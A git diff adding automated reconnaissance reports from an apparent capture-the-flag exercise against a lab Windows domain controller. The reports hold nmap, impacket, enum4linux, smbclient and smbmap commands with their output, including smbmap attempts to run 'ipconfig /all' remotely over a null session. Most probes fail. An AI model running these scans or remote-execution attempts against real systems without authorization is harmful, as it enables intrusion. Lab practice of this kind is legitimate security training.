36.79 ms 10.10.14.1 +2 ... 9 +10 35.90 ms 10.129.243.131 + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:15:18 2023 -- 1 IP address (1 host up) scanned in 1812.34 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top TCP Ports.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top TCP Ports.md new file mode 100644 index 00000000..5dd272d2 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top TCP Ports.md @@ -0,0 +1,81 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:45:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml 10.129.243.131 +Increasing send delay for 10.129.243.131 from 0 to 5 due to 11 out of 20 dropped probes since last increase. +Nmap scan report for 10.129.243.131 +Host is up, received user-set (0.14s latency). +Scanned at 2023-10-28 13:45:20 CEST for 264s +Not shown: 988 filtered tcp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/tcp open domain syn-ack ttl 127 Simple DNS Plus +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +|_http-title: Slandovia Energy +| http-methods: +| Supported Methods: OPTIONS TRACE GET HEAD POST +|_ Potentially risky methods: TRACE +88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:47:30Z) +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +445/tcp open microsoft-ds? syn-ack ttl 127 +464/tcp open kpasswd5? syn-ack ttl 127 +593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped syn-ack ttl 127 +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +3269/tcp open tcpwrapped syn-ack ttl 127 +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +Device type: specialized +Running (JUST GUESSING): AVtech embedded (87%) +OS fingerprint not ideal because: Missing a closed TCP port so results incomplete +Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%) +No exact OS matches for host (test conditions non-ideal). +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653CF558%P=x86_64-pc-linux-gnu) +SEQ(SP=103%GCD=1%ISR=109%TI=RD%TS=U) +OPS(O1=M550NW8NNS%O2=M550NW8NNS%O3=M550NW8%O4=M550NW8NNS%O5=M550NW8NNS%O6=M550NNS) +WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70) +ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M550NW8NNS%CC=Y%Q=) +T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=) +T2(R=N) +T3(R=N) +T4(R=N) +U1(R=N) +IE(R=Y%DFI=N%TG=80%CD=Z) +IE(R=N) + +Network Distance: 2 hops +TCP Sequence Prediction: Difficulty=258 (Good luck!) +IP ID Sequence Generation: Randomized +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +| smb2-security-mode: +| 311: +|_ Message signing enabled and required +|_clock-skew: 59m57s +| smb2-time: +| date: 2023-10-28T12:49:11 +|_ start_date: N/A +| p2p-conficker: +| Checking for Conficker.C or higher... +| Check 1 (port 25314/tcp): CLEAN (Timeout) +| Check 2 (port 10793/tcp): CLEAN (Timeout) +| Check 3 (port 25536/udp): CLEAN (Timeout) +| Check 4 (port 25523/udp): CLEAN (Timeout) +|_ 0/4 checks are positive: Host is CLEAN or ports are blocked + +TRACEROUTE (using port 135/tcp) +HOP RTT ADDRESS +1 191.57 ms 10.10.14.1 +2 183.81 ms 10.129.243.131 + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:44 2023 -- 1 IP address (1 host up) scanned in 278.93 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/Nmap MSRPC.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/Nmap MSRPC.md new file mode 100644 index 00000000..de4e959f --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/Nmap MSRPC.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 135 --script=banner,msrpc-enum,rpc-grind,rpcinfo -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 1s + +PORT STATE SERVICE REASON VERSION +135/tcp filtered msrpc no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:48 2023 -- 1 IP address (1 host up) scanned in 3.66 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/get-arch.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/get-arch.md new file mode 100644 index 00000000..acaf919b --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/get-arch.md @@ -0,0 +1,15 @@ +```bash +impacket-getArch -target 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt): + +``` +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Gathering OS architecture for 1 machines +[*] Socket connect timeout set to 2 secs +[-] 10.129.243.131: Could not connect: timed out + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/rpcdump.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/rpcdump.md new file mode 100644 index 00000000..88f7b518 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/rpcdump.md @@ -0,0 +1,15 @@ +```bash +impacket-rpcdump -port 135 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt): + +``` +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Retrieving endpoint list from 10.129.243.131 +[-] Protocol failed: Could not connect: timed out +[*] No endpoints found. + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Enum4Linux.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Enum4Linux.md new file mode 100644 index 00000000..fd69450e --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Enum4Linux.md @@ -0,0 +1,148 @@ +```bash +enum4linux -a -M -l -d 10.129.243.131 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt): + +``` +Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Oct 28 13:49:45 2023 + + =========================================( Target Information )========================================= + +Target ........... 10.129.243.131 +RID Range ........ 500-550,1000-1050 +Username ......... '' +Password ......... '' +Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none + + + ===========================( Enumerating Workgroup/Domain on 10.129.243.131 )=========================== + + +[E] Can't find workgroup/domain + + + + ===============================( Nbtstat Information for 10.129.243.131 )=============================== + +Looking up status of 10.129.243.131 +No reply from 10.129.243.131 + + ==================================( Session Check on 10.129.243.131 )================================== + + +[+] Server 10.129.243.131 allows sessions using username '', password '' + + + ==========================( Getting information via LDAP for 10.129.243.131 )========================== + + +[+] 10.129.243.131 appears to be a child DC + + + ===============================( Getting domain SID for 10.129.243.131 )=============================== + +Domain Name: MEGACORP +Domain Sid: S-1-5-21-855300830-391258870-456067225 + +[+] Host is part of a domain (not a workgroup) + + + ==================================( OS information on 10.129.243.131 )================================== + + +[E] Can't get OS info with smbclient + + +[+] Got OS info for 10.129.243.131 from srvinfo: +do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED + + + ======================================( Users on 10.129.243.131 )====================================== + + +[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED + + + +[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED + + + ===============================( Machine Enumeration on 10.129.243.131 )=============================== + + +[E] Not implemented in this version of enum4linux. + + + ================================( Share Enumeration on 10.129.243.131 )================================ + +do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) + + Sharename Type Comment + --------- ---- ------- +Reconnecting with SMB1 for workgroup listing. +Unable to connect with SMB1 -- no workgroup available + +[+] Attempting to map shares on 10.129.243.131 + + + ===========================( Password Policy Information for 10.129.243.131 )=========================== + + +[E] Unexpected error from polenum: + + + +[+] Attaching to 10.129.243.131 using a NULL share + +[+] Trying protocol 139/SMB... + + [!] Protocol failed: Cannot request session (Called Name:10.129.243.131) + +[+] Trying protocol 445/SMB... + + [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. + + + +[E] Failed to get password policy with rpcclient + + + + ======================================( Groups on 10.129.243.131 )====================================== + + +[+] Getting builtin groups: + + +[+]  Getting builtin group memberships: + + +[+]  Getting local groups: + + +[+]  Getting local group memberships: + + +[+]  Getting domain groups: + + +[+]  Getting domain group memberships: + + + =================( Users on 10.129.243.131 via RID cycling (RIDS: 500-550,1000-1050) )================= + + +[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. + + + ==============================( Getting printer info for 10.129.243.131 )============================== + +do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED + + +enum4linux complete on Sat Oct 28 13:50:18 2023 + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Nmap SMB.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Nmap SMB.md new file mode 100644 index 00000000..24602ad0 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Nmap SMB.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:46 2023 as: nmap -vv --reason -Pn -T4 -sV -p 139 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 2s + +PORT STATE SERVICE REASON VERSION +139/tcp filtered netbios-ssn no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.71 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBClient.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBClient.md new file mode 100644 index 00000000..9a48faf8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBClient.md @@ -0,0 +1,11 @@ +```bash +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt): + +``` +do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_IO_TIMEOUT) + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBMap.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBMap.md new file mode 100644 index 00000000..75ac190d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBMap.md @@ -0,0 +1,66 @@ +```bash +smbmap -H 10.129.243.131 -P 139 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -H 10.129.243.131 -P 139 -R 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/nbtscan.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/nbtscan.md new file mode 100644 index 00000000..40db1a61 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/nbtscan.md @@ -0,0 +1,12 @@ +```bash +nbtscan -rvh 10.129.243.131 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt): + +``` +Doing NBT name scan for addresses from 10.129.243.131 + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-3268-ldap/Nmap LDAP.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-3268-ldap/Nmap LDAP.md new file mode 100644 index 00000000..62c0a399 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-3268-ldap/Nmap LDAP.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:46 2023 as: nmap -vv --reason -Pn -T4 -sV -p 3268 "--script=banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:48 CEST for 1s + +PORT STATE SERVICE REASON VERSION +3268/tcp filtered globalcatLDAP no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.69 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-389-ldap/Nmap LDAP.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-389-ldap/Nmap LDAP.md new file mode 100644 index 00000000..99012d28 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-389-ldap/Nmap LDAP.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 389 "--script=banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:48 CEST for 1s + +PORT STATE SERVICE REASON VERSION +389/tcp filtered ldap no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.72 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/Nmap SMB.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/Nmap SMB.md new file mode 100644 index 00000000..542cc3e4 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/Nmap SMB.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 445 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 2s + +PORT STATE SERVICE REASON VERSION +445/tcp filtered microsoft-ds no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.64 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/SMBMap.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/SMBMap.md new file mode 100644 index 00000000..99d3b8c1 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/SMBMap.md @@ -0,0 +1,66 @@ +```bash +smbmap -H 10.129.243.131 -P 445 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -H 10.129.243.131 -P 445 -R 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` +```bash +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt): + +``` +[!] 445 not open on 10.129.243.131.... + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-464-kpasswd5/Nmap Kerberos.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-464-kpasswd5/Nmap Kerberos.md new file mode 100644 index 00000000..cc01b66d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-464-kpasswd5/Nmap Kerberos.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" 